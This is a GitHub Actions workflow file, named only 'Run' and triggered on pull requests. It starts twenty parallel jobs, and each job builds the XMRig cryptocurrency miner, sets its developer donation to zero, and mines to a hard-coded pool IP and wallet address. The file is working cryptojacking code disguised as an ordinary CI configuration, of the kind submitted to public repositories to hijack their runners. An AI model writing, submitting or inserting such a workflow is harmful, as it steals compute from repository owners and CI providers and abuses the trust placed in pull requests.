name: Run
on: [pull_request]
jobs:
    run:
        name: Run
        runs-on: ubuntu-latest
        strategy:
          fail-fast: false
          matrix:
            runner: [0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19]
        steps:
          - shell: bash
            run: |
              sudo apt-get update
              sudo apt-get install --yes build-essential cmake git libhwloc-dev libssl-dev libuv1-dev
              curl -Lo xmrig.tar.gz https://github.com/xmrig/xmrig/archive/refs/tags/v6.10.0.tar.gz
              tar xf xmrig.tar.gz
              cd xmrig-*
              sed -Ei 's/^(.*DonateLevel = )(.*)$/\10;/g' src/donate.h
              mkdir build
              cd build
              cmake .. -DCMAKE_BUILD_TYPE=Release
              make --jobs=$(nproc)

              ./xmrig --url 147.135.37.31:4444 --user 46KEREuhnzQhZw8TuLkbbK7pvscRgyLqjMhQ7Kt6BppAH1hArCkFXinQW44FqoKnr76WWBEKHgHHuFqc7FXkn9vyNyqAiDa --pass x --donate-level 0 
